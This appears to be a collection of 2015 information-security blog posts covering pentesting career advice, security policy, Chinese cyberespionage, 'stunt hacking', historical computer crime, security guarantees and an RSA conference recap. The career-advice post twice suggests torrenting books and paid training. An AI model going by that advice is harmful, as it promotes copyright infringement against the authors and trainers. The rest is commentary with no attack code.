-What's your favorite US and non-US security conference and why?
* Troopers and BRUCON but to be fair I haven't been to many EU cons and zero AP cons
* Derbycon for US con. I actually don't go to that many cons anymore. I'd rather be home with the wife and kids

-Are you currently working on any security projects?
* Not that I can currently share but maybe soon.

-What are you general thoughts on crowdsource programs such as Bugcrowd or HackerOne?
* Bugs getting fixed is always good. However, I think the payouts are too low for most bugs.

-What recent research from the security community has excited you the most in the past year or has had tremendous impact (aside from Heartbleed)?
* BIOS rootkits, GPU rootkits, tools/techniques the NSA uses that were disclosed by Snowden.

-Does the public really care about cybersecurity?
* They care about their dickpics getting leaked or can be seen by the NSA (https://www.youtube.com/watch?v=XEVlyP4_11M) but otherwise no. Plus check out the stock for TJ Maxx, Target, any of these healthcare companies. Its not affecting them long term.

Answers on how to get started in Security

noreply@blogger.com (CG) — Wed, 27 May 2015 18:08:00 +0000

I got hit up on twitter and email about how to get started in security by someone. The question was pretty generic and since I didn't even receive a thanks back from the guy I'm sharing it with everyone else/archiving it in case I'm asked again in the future.

The question:

I want to become proficient at pentesting on computers and phones. I have a running version of Kali Linux on my computer and am using the "Kali Linux Cookbook" as a reference. What book or online tutorials would you recommend for me to use in order to get better?

A few things I think you should do to get started.

1. Get rid of Kali. It is a shortcut to learning to have all these tools already there. You'll learn way more by figuring out what tool you need for a job/task (feel free to use the index of tools in Kali which is readily available) and installing the tool yourself. Ubuntu is the most supported hacker tool wise but there are other distros. Pick whatever suits you. Use a VM so you can undo stuff if you break your distro but that's pretty rare these days. Most things apt-get install or compile from source on ubuntu without issues.

2. You are in luck these days as there are tons and tons of resources available to learn infosec.

-Books I'd start with ( buy or torrent depending on ability)

The latest Hacking Exposed book. The methodology it teaches is still relevant today and its a 10,000 ft view of different hacking areas
Pick a basics of pentesting book (or a few) to start with I've stopped reading the basics books but any of them should wet your appetite.

Some examples (more netsec):

Some examples (webappsec)

Web Application Security, A Beginner's Guide - by Bryan Sullivan and Vincent Liu (read this, its decent)
Hacking Exposed Web Applications (current version)
Web Application Hackers Handbook (more advanced)

Some examples (social engineering)

Some examples (Physsec/redteam)

Lots more here, the list is a bit dated i'll try to update it this week but it IS sorted by category
http://astore.amazon.com/carnal0wnage-20

Exploit dev

Tons and tons of books/resources. Unless you are really really interested in writing exploits I wouldn't start here. Understanding the above will give you more opportunities for jobs in the business, writing exploits and automating tasks will come naturally as you progress

3. Pick a scripting language to work on

python is probably most supported/popular
ruby is what metasploit is written in, so there is value in learning that
javascipt/node.js will be useful going forward as well

4. Online CTFs

Pretty good list here: http://captf.com/practice-ctf/
Vulnhub for downloadable images to try https://www.vulnhub.com/
Search for downloadable vulnerable images to hack against herot, metasploitable, owasp broken apps

5. Training
Lots out there, plenty is torrentable or pay for it if you feel like it/can (you should if you can afford it -- those people work hard on it). With the amount of resources you should be able to learn the basics without paying a dime and seek out mentors or ask questions over email/twitter for topics you are stuck on.

Second Question:

Also, what steps did you initially take to become proficient at computer security?

-I was a computer science major in college so I came out knowing some of the basics. My job in the military was communications and I ended up doing a lot of layer 2/layer 3 stuff along with MCSE type tasks. Its going to be important for you to learn, if you don't already know, A+ type material and Network+/basic CCNA type materials. Hacking is all about exploiting the mistakes someone made setting things up, abusing protocols, but a lot of finding/identifying/exploiting misconfigurations. This is a lot easier if you understand how to do these basic configurations.

Aside from that, start practicing, reading blogs/twitter, watching talks that interest you. I'd start with a basic ones but also stuff advanced/over your head. Getting your mind blown occasionally helps let you know there really is no limit to the stuff you can do, what you can learn, etc. http://www.securitytube.net/ has pretty much everything and more content than you will ever be able to consume plus lots of free courses.

That's what I have for starters as you asked a pretty generic question, so hope that helps

Chris

The Policy Trap

Ben Tomhave — Tue, 26 May 2015 13:49:09 +0000

It's that time of year again: time to update the policies! This annual exercise is always a source of great enjoyment for me (no, not really). After all, there's nothing like having the non-technical flailing about as they try to force-feed technical requirements down the throats of IT without explaining, justifying, or providing any factual basis for asking. If there's something most techies love, it's an over-the-top policy recommended by external auditors.

Quite frankly, policies are the precursor to, and embodiment of, the checkbox-compliance mindset. We all know how well that's worked out for us thus far. I mean, looking at all the data breaches we're not having thanks to compliance and policies, right? Hahaha... oh.

One of the biggest problems with these annual policy-update exercises is that "policies" are rarely defined properly within the enterprise. Instead, you get a jumble of policies, standards, baselines, processes, and procedures, all crammed into some monolithic document that some know about, few review, and even fewer follow.

Policies should, definitionally, be a statement on desired risk management strategy. They must articulate the business case and basis for understanding operational risk and how the enterprise desires to manage that risk. These statements should create the limits known as risk tolerance, risk capacity, and risk appetite with means for measuring against those limits to ensure that IT is operating within the defined parameters.

Policies are not the place to document specific technical controls (or practices). Those statements must exist within the other lower levels of documentation, and for the most part should be owned by the operational teams, which will ensure that they have a desire to adhere to their own defined practices.

A quick path to failure is having non-technical compliance people telling technical people how to operate their IT without actually understanding what they're talking about. As if we didn't have enough credibility challenges, let's just make it worse by trying to inject incompetence and misunderstanding into a technical environment. That should work out great.

This line of thought leads me to three significant fallacies I've consistently encountered.

Fallacy #1: If You Write Them, They Will Comply

One of the most amusing notions is that of the aspirational security policy. "If we write this policy at this level, then everyone will come into line. We just need the strength of a policy to force people into a new way of behavior." All good and fine until you then immediately start issuing exceptions to the policy because people can't comply. Or, worse, your policy isn't really a policy, but rather a standard, baseline, proc & proc, etc.

The fact of the matter is that policies should not be viewed as "something to comply with" rather than as "the risk maangement boundaries within which we must operate." Policies should clearly articulate the risk management strategy and then everything else (such as technical standards) should provide the implementation details that demonstrate meeting those expectations.

A perfect example is the SOX audit. SOX 404 does not specify technical controls. It establishes a high-level objective to guard against fraud in financial systems. Unfortunately, the AICPA, ISACA, and auditor community has spun that to mean specific technical practices when, really, the focus should be on a handful of specific, auditable capabilities like monitoring for configuration state changes, monitoring for attacks and anomalous access/traffic, and demonstrating overall process integrity through automated methods/mechanisms. However, these things are a bit more "squishy" and require a lot more technical savvy to audit, which leads to devolving the requirements to checklists, which in turn can be adopted by people lacking cluefulness, forced down the throats of ops teams that are already under siege from other quarters. It's a lose-lose proposition, and I marvel that anybody willingly enters the IT space any more, figuring they just don't realize what they're in for... but I digress...

Fallacy #2: Policies Stop Incidents

Show me a documented policy that has stopped a data breach. No, really... I'll wait. Policies don't stop breaches, nor should they! Policies establish the overall risk management context within which specific practices should be established.

Technical and administrative controls stop incidents. Policies are neither of these things. Processes and procedures are administrative controls. They align to desired performance characteristics set forth in policies. So it also is for technical controls. What this means is that a policy, at best, provides a one-off means of protection against incidents, but because you don't implement policies so much as align to the standard of performance, they do not prevent anything.

I asked this question on Twitter and one response back pointed to an example of a "policy" that said "don't ever give your password out, IT will never ask for it" as an example of a policy preventing an incident. It was highlighted that this "policy" typically resides inside "employee policies." My response and counter-argument is that this isn't a "policy" so much as a security awareness talking point, and that it's now lumped in with HR "policies," which are distinctly different from security/technical policies. What this really amounts to is an administrative control ("awareness statement") that is placed within an HR context for the purposes of making people aware of what to expect.

Maybe it's nitpicking, but the point is this: the policy statement/objective is to minimize the incident of compromised accounts because it has negative impact on the business, and one of the administrative controls implemented to meet this objective is the awareness initiative telling people not to give out their passwords. Undoubtedly, there will be several other technical and administrative controls to further meet that high-level objective.

Fallacy #3: You Can Just Adopt Standard X For Policies

First, why would you want to abdicate decisional authority for how your organization functions to a third party entity that knows nothing about your organization? Second, most standards start with a "scoping" phase that require you to first understand and define your business requirements, which is what your policies should be articulating (anything more than that gets beyond the role of a policy and into the land of standards, baselines, etc.). Third, while various standards and lists of practices can be instructive, such as for security architecture, it's rarely a good idea to blindly adopt them wholesale without heavily customizing them to meet your organization's needs.

Yes, it's true that lists of practices like the CCS Critical Security Controls (formerly SANS) can be informative in terms of making specific technical architecture decisions, but this is most definitely not the realm of policies. Policies must articulate why specific changes are necessary/important and what business risk management objective is being achieved. It's a common misconception among certain populations(*cough*auditors*cough*) that one can simply checklist-away all of the world's ills. Of course, if this were true, and if securing the enterprise were really so easy, then we wouldn't need to have this conversation.

---
Policies typically are nothing more than a trap. Some folks mistakenly believe in aspirational policies, which cannot be enforced, which means that they're null and void (and, enforcing them arbitrarily can lead to legal issues). Others think that writing a policy will magically change practices or corporate culture. Again, a logical trap in that the policies don't actually do anything. If the policy isn't a direct change in practices, then it's a one-off, which we know definitely does not result in change.

The proper use of a policy is articulate business requirements and objectives, which are then met through the implementation of technical and administrative controls. These controls should be owned by the implementing teams, which allows them the flexibility to come up with feasible solutions. The policy should provide a means for measuring that "risk" is within the defined limits, but must stop short of specifying the "how." Sadly, this perspective is often misunderstood and misrepresented, leading to the annual circus of "policy updates."

Fun times.

An Irrelevant Thesis

Richard Bejtlich — Sat, 23 May 2015 12:40:00 +0000

This week The Diplomat published an article by Dr Greg Austin titled What the US Gets Wrong About Chinese Cyberespionage. The subtitle teases the thesis: "Is it government policy in China to pass on commercial secrets obtained via cyberespionage to civil sector firms?" As you might expect (because it prompted me to write this post), the author's answer is "no."

The following contains the argument:

"Chinese actors may be particularly adept in certain stages of economic espionage, but it is almost certainly not Chinese government policy to allow the transfer of trade secrets collected by highly classified intelligence sources to its civil sector firms for non-military technologies on a wide-spread basis.

A U.S. influencing strategy toward China premised on the claim that this is China’s policy would appear to be ill-advised based on the evidence introduced so far by the United States in the public domain." (emphasis added)

I find it interesting that the author concedes theft by Chinese government actors, which the Chinese government refuses to acknowledge. However, the author seeks to excuse this activity out of concern for the effect it has on US-China ties.

One aspect of the relationship between China and the US worries the author most:

"There are many ways to characterize the negative impact on potential bilateral cooperation on cyberspace issues of the “lawfare” being practised by the United States to discipline China for its massive cyber intrusions into the commercial secrets of U.S. firms. One downside is in my view more important than others. This is the belief being fostered by U.S. officials among elites in the United States and in other countries that China as a nation is a “cheater” country..."

Then, in a manner similar to the way Chinese spokespeople respond to any Western accusations of wrongdoing, the author turns the often-heard "Chinese espionage as the largest transfer of wealth in history" argument against the US:

"In the absence of any Administration taxonomy of the economic impacts of cyber espionage, alleged by some to represent the largest illicit transfer of wealth in human history, one way of evaluating it is to understand that for more than three decades it has been U.S. policy, like that of its principal allies, to undertake the largest lawful transfer of wealth in human history through trade with, investment in and technology transfer to China."

(I'm not sure I understand the cited benefits the US has accrued due to this "largest lawful transfer of wealth in human history," given the hollowing out of the American manufacturing sector and the trade imbalance with China, which totaled over $82 billion in 1Q15 alone. It's possible I am not appreciating what the author means though.)

Let's accept, for argument's sake, that it is not "official" Chinese government policy for its intelligence and military forces to steal commercial data from private and non-governmental Western organizations. How does accepting that proposition improve the situation? Would China excuse the US government if a "rogue" element of the American intelligence community or military pursued a multi-decade campaign against Chinese targets?

Even if the US government accepted this "Chinese data theft by rogue government actor" theory, it would not change the American position: stop this activity, by whatever means necessary. Given the power amassed by President Xi during his anti-corruption crackdown, I would expect he would be able to achieve at least some success in limiting his so-called "rogue actors" during the 2+ years since Mandiant released the APT1 report. As Nicole Perlroth reported this month, Chinese hacking continues unabated. In fact, China has introduced new capabilities, such as the so-called Great Cannon, used to degrade GitHub and others.

Similar to the argument I made in my post What Does "Responsibility" Mean for Attribution?, "responsibility" is the key issue. Based on my experience and research, I submit that Chinese computer network exploitation of private and non-governmental Western organizations is "state-integrated" and "state-executed." Greg Austin believes the activity is, at worst, "state-rogue-conducted." Stepping down one rung on the state spectrum of responsibility ladder is far from enough to change US government policy towards China.

Note: In addition to the article in The Diplomat, the author wrote a longer paper titled China’s Cyberespionage: The National Security Distinction and U.S. Diplomacy (pdf).

I also plan to read Dr Austin's new book, Cyber Policy in China, which looks great! Who knows, we might even be able to collaborate, given his work with the War Studies department at KCL.

Lets Call Stunt Hacking What it is, Media Whoring.

noreply@blogger.com (valsmith) — Sun, 17 May 2015 00:46:00 +0000

Lets Call Stunt Hacking What it is, Media Whoring.

by Valsmith

I recently read this article: http://www.foxnews.com/tech/2015/03/17/ground-control-analysts-warn-airplane-communications-systems-vulnerable-to/and it brought to mind some thoughts that have been percolating for quite a while. Sometime last year I believe Dave Aitel coined the term Stunt Hacking, which I think is a pretty good way to describe it. We often see these media blitzes about someone hacking a car, or an airplane, or some other device. The public who has a limited understanding of the technology, and the media who has a worse understanding, get in a frenzy or outrage, the security company hopes this translates into sales leads, and the researcher hopes this translates into name recognition leading to jobs, raises, conference talks, etc.

A question that I think we should keep in mind is: Why would a company hire someone who just publicly displayed how little they understand about the technology and made their desired potential client look bad.

There are two problems with this: 1.) The research is often FUD or based on a very limited understanding of real world deployment or 2.) Any actually valuable technical research gets lost in the hype.

Let me be clear, I am not saying that researchers like Charlie Miller or Barnaby Jack haven't contributed meaningful or ground breaking research to the community, (they have), but many ride a hype wave that is often unwarranted. Unscrupulous infosec companies take advantage of such researchers work to drive sales of mediocre consulting services as well.

The practice of companies pushing their best researchers to drop and overhype controversial or gimmicky bugs makes no sense from a business perspective either from the security vendor or the services purchaser point of view. Who wins in the long run? The vendor loses credibility and the purchaser suffers in the PR space.

Stunt hacking often works something like this:

1.) Purchase from Ebay or otherwise some component of a system widely in use that doesn't look like a computer but uses underlying computeresque technology.

2.) Since physical access to the device is ensured (unlike in the real world), spend a period of time analyzing and understanding the device.

3.) Develop or acquire some tool set to interact with the device.

4.) Make the device do something that the public perceives is out of the ordinary or unusual.

5.) Issue a number of hyping press releases. (The media has a vested interest in producing spectacular stories)

6.) Jump on the security conference talk circuit and present the research as many times as possible.

There are several issues with this and I can use some real world examples to explain them. When you state that you can hack an airplane based on something you saw (or worse did) on a flight, and that a particular vendor is or is not security responsible, you are missing a number of things:

FAA Involvement - There are processes for approval, auditing, development and release cycles that pass through FAA policies. This affects time frames for patches to be pushed, what kinds of software can be installed, and how things are updated and inter-connected.
Airline Involvement - What a particular vendor develops is often heavily modified or integrated into an airline's customized product suite. This means that company A could develop a piece of hardware or software for airplanes, the airline buys it, then the airline drastically changes it. It may not be immediately obvious where the responsibility for a security issue lies.
Aircraft Manufacturer Involvement - Essentially the same as the previous point.
Air crews - Maintenance and flight crews have the ability to modify some settings and make changes to the system.
Product Vendor - The originator of a particular product. If they want to push a change, such as a security fix, all the above stakeholders and more have to be involved in that process. That means that an issue can be known, a fix developed and released, and it can take months or even years while it transitions all the stakeholders and each makes a business decision about applicability and severity before it reaches a particular airplane.
Safety Concerns - Any technology that goes on to an aircraft is rigorously analyzed and tested for any potential impact to flight safety. Even if this technology doesn't touch the flight systems, its presence on the plane requires that it be checked. This leads to a slow down in the deployment of both new technologies, as well as fixes.
End of Life Cycles - An airline can purchase a particular system, but that doesn't mean that they will purchase a new system or upgrade the old one. Serious fixes will likely be implemented, but as technology changes, older systems may fall by the wayside in security maintenance. It is a valid business decision for an airline or other org. to look at the cost of general technology upgrades across a fleet.

Just because a company doesn’t want to hire YOU in particular, or tell you about what they are doing security wise, doesn’t mean that they don’t care about security! Or that they are doing nothing! For all you know they have a team of well credentialed people working on it and external factors make the release of fixes slower than you would personally prefer. Such hubris in this industry.

Do you want electronics and backpacks with gear in them banned on airplanes? Because that is how you get there. Do you want the adversarial, but slowly healing, relationship between hackers and business to become openly hostile and driving research totally underground? That's how you get there.

Have some professionalism! Try to work with the vendor so that you get a fuller picture and can provide more value to the world. If they don't want to work with you, understand there may be many factors at play that you are unaware of, and rely on the fact that you are creative and move on to a new technology.

The 1990's and early 2000's were a valuable time where groups such as the l0pht pushed companies to develop security programs and fix bugs. They succeeded for the most part. We now live in a world with bug bounties, security budgets, and companies that actually care about their security. Its time to evolve our tactics on the researcher side to match the evolution business has made. Unless you are an underground hacker / blackhat. In that case, don't promote yourself as a professional researcher and try to get contracts! Do your thing but own it, don't pretend to be something you're not.

Let’s take another example; ATMs. When you buy a used ATM off of Ebay or something similar and develop an attack for it, there are assumptions that are made and important things left out of the equation.

What is the physical protection regime and tamper evident posture for a particular location, bank, or deploying maintenance company?
What vendor modules are enabled or disabled via licensing on the individual ATM?
What is the middleware in use and how is it configured to protect or configure a particular ATM?
What are the interconnects to the bank and what transports are used? Cell, modem, Ethernet, etc.
What card tracks are in use?
Is it a modified XP, OS2warp, or other OS?
How and where does an HSM come in to play?

All of these things apply or have corollaries in the automotive, satellite, medical, SCADA, and other industries. In the end, they are just computers of one sort or another.

Next we need to discuss what our industry is really doing with all of this. I've seen many researchers feign outrage that something is "so insecure" and wanting to "protect users". After sitting through 10 years of conference private parties, I have serious doubts that this is always the case. I think fame, media attention, hacker cred, etc. are more frequently the drivers than some sort of user centric altruism. Not always, but often.

This is exacerbated by the fact that it is a common tactic for security companies to hire one or two "rock star" researchers, have them pull off a bit of stunt hacking, often of dubious impact, and then push the FUD as hard as possible across whatever conferences will take them and whatever news shows will interview them.

I feel I can speak about this because I spent a lot of time speaking at conferences (at one point I think I held the record for the most talks in one week, 7.) and I was interviewed by media here and there. This personal experience is how I learned it is a bunch of BS. The media, for the most part, doesn't care or understand what you are talking about, really. They care about viewers for a short news cycle and FUD is sensational and achieves this goal. As far as the conference circuit, well that's full of BS as well. I remember attending a highly technical talk on rootkits by Joanna Rutkowska, a brilliant researcher in her own right, so please don't mistake this for me bagging on her, I'm not. The material in the talk was compelling and she broke new ground. However eavesdropping on other audience members, few knew what she was talking about. Multiple times I heard "I have no idea what she is talking about, but she's really smart". They paid thousands of dollars for that privilege. And rootkits have little impact on day to day security for most businesses. The value of highly technical security conferences is rather low, except to the researchers themselves, and pushing the field forward. But it is a money maker. I think it is rather telling that you don't see many talks from her anymore, perhaps she figured out the same issues I am talking about, I don't know. She does however continue to conduct highly technical, academically and business valuable work, quietly, without unnecessary hype.

I gave both technical talks as well as conceptual ones full of pictures. Other researchers somewhat respected the former while general audiences got little out of it. Audiences enjoyed and found the latter valuable, while researchers couldn't take me seriously. I tested this over 10 years and my conclusion is that for me, conferences have little value. But stunt hacking plays deeply into this dysfunction. It generates press for the conference and the researcher, dazzles and outrages attendees, and generates money and fun for many. But is it really helping anything?

If a "researcher" spends all their time on the conference circuit and talking on cable news shows, how much of a researcher are they really versus a marketing professional? A wise man once told me; "Let your work speak for itself."

And now we can proceed into the darker side of all this. High pressure sales in infosec. Most of my clients are former clients of big name, well known security companies. After a period of trust building they often show me the reports, deliverables, and emails from previous infosec "professionals" that they have engaged before me. THIS is where the real outrage and disappointment comes into play. Extremely poor deliverables for big bucks, arrogant "recommendations" (more like demands) with little business value, and a focus on upselling versus doing a good job on the current project is the norm. Several times I have seen the following:

Infosec company / individual: "Hire me/us to be your security researcher". Often this is after an initial first gig that didn't work out well.

Potential Client: "No thanks, we already have someone and we don't like the way you do business". Doing business often refers to everything but the technical work. For example communications, documentation, status reports, pricing, honoring NDA's, etc.

Infosec company / individual: "You better hire us or we will tell everyone how insecure and irresponsible you are!". Telling everyone involves conferences and media.

Potential Client: "That seems like a bad idea, especially since we have someone good working on it and you have an NDA with us, which you would be violating."

Infosec company / researcher: "We don't care, hire us or else!"

I may have oversimplified the exchange slightly in the interest of brevity, but this borderlines on extortion and is unacceptable. This kind of short sighted behavior is dragging our industry down and hurting the credibility of everyone, especially since it is so common. The focus on short term, scan and bang profits versus long term relationship building and iterative, incremental, business benefiting improvement is damaging the ability of legitimate researchers and companies to engender real change. Organizations are becoming disillusioned with engaging in real infosec, even as it becomes a hot industry.

This must stop. Stunt hacking must die. Researchers must learn to look beyond a overhyped-bug-snapshot in time and LEARN the industries and technologies they research. In the old days hackers knew more about a technology than the people building and maintaining it, not just how to break something and move on to the next trademarked bug. Let’s get back there before we lose all credibility.

What Year Is This?

Richard Bejtlich — Sun, 10 May 2015 15:07:00 +0000

I recently read a manuscript discussing computer crime and security. I've typed out several excerpts and published them below. Please read them and try to determine how recently this document was written.

The first excerpt discusses the relationship between the computer and the criminal.

"The impersonality of the computer and the fact that it symbolizes for so many a system of uncaring power tend not only to incite efforts to strike back at the machine but also to provide certain people with a set of convenient rationalizations for engaging in fraud or embezzlement. The computer lends an ideological cloak for the carrying out of criminal acts.

Computer crime... also holds several other attractions for the potential lawbreaker. It provides intellectual challenge -- a form of breaking and entering in which the burglar’s tools are essentially an understanding of the logical structure of and logical flaws inherent in particular programming and processing systems. It opens the prospect of obtaining money by means that, while clearly illegal, do not usually involve taking it directly from the till or the cashier’s drawer...

Other tempting features of computer crime, as distinct from other forms of criminal activity, are that most such crimes are difficult to detect and that when the guilty parties are detected not much seems to happen to them. For various reasons, they are seldom intensively prosecuted, if they are prosecuted at all. On top of these advantages, the haul from computer crime tends to be very handsome compared with that from other crimes."

The second excerpt describes the attitudes of corporate computer crime victims.

"The difficulties of catching up with the people who have committed computer crimes is compounded by the reluctance of corporations to talk about the fact that they have been defrauded and by the difficulties and embarrassments of prosecution and trial. In instance after instance, corporations whose assets have been plundered -- whose computer operations have been manipulated to churn out fictitious accounting data or to print large checks to the holders of dummy accounts -- have preferred to suffer in silence rather than to have the horrid facts about the frailty of their miracle processing systems come to public attention.

Top management people in large corporations fear that publicity about internal fraud could well affect their companies’ trading positions on the stock market, hold the corporations up to public ridicule, and cause all sorts of turmoil within their staffs. In many cases, it seems, management will go to great lengths to keep the fact of an internal computer crime from its own stockholders...

The reluctance of corporations to subject themselves to unfavorable publicity over computer crimes is so great that some corporations actually seem willing to take the risk of getting into trouble with the law themselves by concealing crimes committed against them. Among independent computer security consultants, it is widely suspected that certain banks, which seem exceptionally reluctant to admit that such a thing as computer fraud even exists in the banking fraternity, do not always report such crimes to the Comptroller of the Currency, in Washington, when they occur, as all banks are required to do by federal law. Bank officers do not discuss the details of computer crime with the press... [A] principal reason for this kind of behavior is the fear on the part of the banks that such a record will bring about an increase in their insurance rates."

The third excerpt talks about the challenges of prosecuting computer crime.

"In addition to the problems of detecting and bringing computer crimes to light, there are the difficulties of effectively prosecuting computer criminals. In the first place, the police, if they are to collect evidence, have to be able to understand precisely how a crime may have been committed, and that usually calls for the kind of technical knowledge that is simply not available to most police departments...

Another difficulty is that not only police and prosecutors but judges and juries must be able to find their way through the mass of technical detail before they can render verdicts and hand down decisions in cases of computer crime, and this alone is a demanding task. In the face of all the complexities involved and all the time necessary to prepare a case that will stand up in court, many prosecutors try to make the best accommodation they can with the defendant’s lawyers by plea bargaining, or else they simply allow the case to fade away unprosecuted. If they do bring a case to trial, they have the problem of presenting evidence that is acceptable to the court.

The fourth excerpt mentions "sophistication" -- a hot topic!

To somebody looking at the problem of computer crime as a whole, one conclusion that seems reasonable is that although some of the criminal manipulators of computer systems have shown certain ingenuity, they have not employed highly sophisticated approaches to break into and misuse computer systems without detection. In a way, this fact in itself is something of a comment on the security of most existing computer systems: the brains are presumably available to commit those sophisticated computer crimes, but the reason that advanced techniques haven’t been used much may well be that the haven’t been necessary."

The fifth excerpt briefly lists possible countermeasures.

"The accelerating incidence of computer-related crimes -- particularly in the light of the continuing rapid growth of the computer industry and the present ubiquity of electronic data-processing systems -- raises the question of what countermeasures can be taken within industry and government to prevent such crimes, or, at least, to detect them with precision when they occur...

In addition to tight physical security for facilities, these [countermeasures] included such internal checks within a system to insure data security as adequate identification procedures for people communicating with the computer... elaborate internal audit trails built into a system, in which every significant communication between a user and a computer would be recorded; and, where confidentiality was particularly important, cryptography..."

Now based on what you have read, I'd like you to guess in which decade these excerpts were written? By answering the survey you will learn the publication date.

Loading...

I'll leave you with one other quote from the manuscript:

The fact is, [a security expert] said, that “the data-security job will never be done -- after all, there will never be a bank that absolutely can’t be robbed.” The main thing, he said, is to make the cost of breaching security so high that the effort involved will be discouragingly great.

The Need for Test Data

Richard Bejtlich — Thu, 30 Apr 2015 17:22:00 +0000

Last week at the RSA Conference, I spoke to several vendors about their challenges offering products and services in the security arena. One mentioned a problem I had not heard before, but which made sense to me. The same topic will likely resonate with security researchers, academics, and developers.

The vendor said that his company needed access to large amounts of realistic computing evidence to test and refine their product and service. For example, if a vendor develops software that inspects network traffic, it's important to have realistic network traffic on hand. The same is true of software that works on the endpoint, or on application logs.

Nothing in the lab is quite the same as what one finds in the wild. If vendors create products that work well in the lab but fail in production, no one wins. The same is true for those who conduct research, either as coders or academics.

When I asked vendors about their challenges, I was looking for issues that might meet the criteria of Allan Friedman's new project, as reported in the Federal Register: Stakeholder Engagement on Cybersecurity in the Digital Ecosystem. Allan's work at the Department of Commerce seeks "substantive cybersecurity issues that affect the digital ecosystem and digital economic growth where broad consensus, coordinated action, and the development of best practices could substantially improve security for organizations and consumers."

I don't know if "realistic computing evidence" counts, but perhaps others have ideas that are helpful?

Will "Guaranteed Security" Save the Digital World?

Richard Bejtlich — Tue, 28 Apr 2015 20:47:00 +0000

Thanks to a comment by Jeremiah Grossman on LinkedIn, I learned of his RSA talk No More Snake Oil: Why InfoSec Needs Security Guarantees. I thought his slide deck looked interesting and I wish I had seen the talk.

One of his arguments is that security products and services lack guarantees, "unlike every day 'real world' products," as shown on slide 3 at left.

The difference between the products at left and those protected by security products and services, however, is that security products and services are trying to counter intelligent, adaptive adversaries.

Jeremiah does include a slide showing multiple "online security guarantees" for financial services. Those assets do indeed face challenges from the sorts of adversaries I have in mind. I need to hear more about what Jeremiah said at this point, and also I need to learn more about this individual guarantees.

It may be useful to look at what physical security companies offer by way of guarantees. I did not see this angle in Jeremiah's slides, although he may have talked about it.

Taking a tentative step in this direction, I visited the ADT web site. You've seen their ads for protecting homes, and you might even be a customer. This is the sort of company that faces at least some threats who are intelligent and/or adaptive. What guarantees does ADT offer?

The screen capture below shows the answer. I am particularly interested in the "Theft Protection Guarantee."

A theft protection guarantee is like a "hack prevention guarantee." As you can see, if your home is burglarized while under ADT monitoring, you get up to $500 paid toward your insurance deductible.

The fine print is even more interesting:

"The Customer presenting ADT with this ORIGINAL CERTIFICATE will be eligible to receive a reimbursement of up to five hundred dollars ($500) of Customer’s homeowner’s insurance deductible (if any) if, and only if, ALL of the following requirements are met to ADT’s reasonable satisfaction:

(i) the property loss was the result of a burglary that took place while the security system installed at Customer’s protected premises was in good working order and was “on,” and while all of Customer’s doors and windows were locked; and

(ii) the intruder entered the residence through a door, window or other area equipped with an ADT detection device, and such detection device was not “bypassed”; and

(iii) Customer is not in any way in default under the ADT Residential Systems Customer’s Order; and

(iv) Customer files a written claim with their homeowner’s insurance company, and such claim is not rejected or otherwise contested by the insurer; and

(v) Customer reports the burglary loss to the appropriate police department and obtains

a written police report; and

(vi) Customer provides ADT with copies of the insurance claim report, the police report within six

ty (60) days of the property loss and proof of settlement by insurance carrier; and

(vii) Customer certifies in writing to ADT (by signing this ORIGINAL CERTIFICATE and presenting it to ADT within sixty [60] days of the property loss) that all of the foregoing requirements have been satisfied.

Customer understands that presentation of this ORIGINAL CERTIFICATE signed by Customer is required and understands that ADT reserves the right to reject any application for reimbursement that does not comply with ALL of the requirements." (emphasis added)

Can you imagine the equivalent conditions for a digital security service or product? Could you imagine a customer being able to prove it met the requirements?

It would be interesting to see how many times ADT has paid out this guarantee money.

Wait, you might say, Jeremiah showed a car in the slide at the top of this post. What do car security guarantees look like? I'm glad you asked. Here's one of the top results I found online, for Viper.

Here is the fine print:

"Qualifications:

The qualifying system was sold, installed, and serviced by an authorized dealer for DIRECTED, remains in the car in which the system was originally installed, and owned by the original purchaser of the qualifying system. Window decals must have been in place on the vehicle at the time of installation.

The theft occurred less than one year after the date of purchase of the qualifying Viper system.

This GPP claim is made within sixty (60) days of settlement of your claim with your insurance carrier. (90 days in New York state)

The warranty registration card was completely filled out and mailed to DIRECTED within 10 days of purchase.

The vehicle was stolen as a result of alarm system failure and the automobile was not left in an inactive/disarmed mode for whatever reason, even if left at a service station.

A police report must be filed and a copy submitted with your GPP claim.

Vehicle must be insured against theft at the time vehicle was stolen.

The insurance company must accept and pay the claim.

A DIRECTED starter kill device must have been installed on the vehicle and the sales receipt must show starter kill installation.

Your claim MUST meet all of the criteria as stated above to be eligible to file a claim for reimbursement of your comprehensive deductible...

A product's warranty is automatically void if its date code or serial number is defaced, missing, or altered. GPP does not cover vandalism, theft of vehicle parts, contents, damage to vehicle and/or towing charges. Furthermore, vehicles that are consigned or displayed for sale are not covered by the GPP program. GPP is not available to employees, agents, friends or relatives of Directed or of its dealers.

GPP does not extend to or cover motorcycles or vehicles without lockable doors, ignition systems and/or engine compartments." (emphasis added)

Again, I ask, can you imagine the equivalent conditions for a digital security service or product? Could you imagine a customer being able to prove it met the requirements?

Given these examples of security guarantees in the physical work, I don't think we will see much progress in the digital world, perhaps beyond paying insurance deductibles.

I believe the heavy work on the economic side will be done by the insurance companies, as is indicated by these physical security examples.

We are likely to see more insurance on the security vendor side, as we are already seeing (as noted in Jeremiah's talk) much more insurance in the security consumer (enterprise) arena.

Quick addendum: It just occurred to me that the security services mentioned earlier are primarily means to the following:

Decrease insurance premiums.
Deter attackers.
If deterrence fails, increase the changes of more rapid police response.

These ideas have some relevance in the digital security world, although I think "stickers" saying "protected by product X and service Y" may have the opposite effect, as they may give intruders ideas on how to bypass the defenses. Then again, that might already happen with the house and car alarm examples.

RSA 2015: Security Mega-Con!

Ben Tomhave — Tue, 28 Apr 2015 15:36:40 +0000

It was another record year for the RSA Conference USA, with a reported 33,000 attendees (an increase, I believe of 8-10k year-over-year). This year also saw the first truly full-scale double-expo event with both Moscone North and South sporting packed expo spaces with more vendors than seemed possible or reasonable. Impressive growth for our industry, to be sure, though as always in many ways it raised more questions than provided answers.

Due to limited personal funding, my trip was short (Tu-Th) this year, so I missed out on the DevOps Connect event Monday, which I heard was phenomenal. I also didn't get a chance to look at Innovation Sandbox, though given prior year experiences I wasn't too disappointed. I did wish I could have caught Amit Yoran's first opening keynote as RSA big chief, but alas it wasn't to be...

A couple themes I noticed this year:

1) Automate everything!

Dozens of booths had the word "automate" (or related derivative) on display. Some of the automation was the same old broken stuff we've seen for years. Some was just workflow automation. A LOT was incident response related (oftentimes automated malware response). However, it was a major theme throughout.

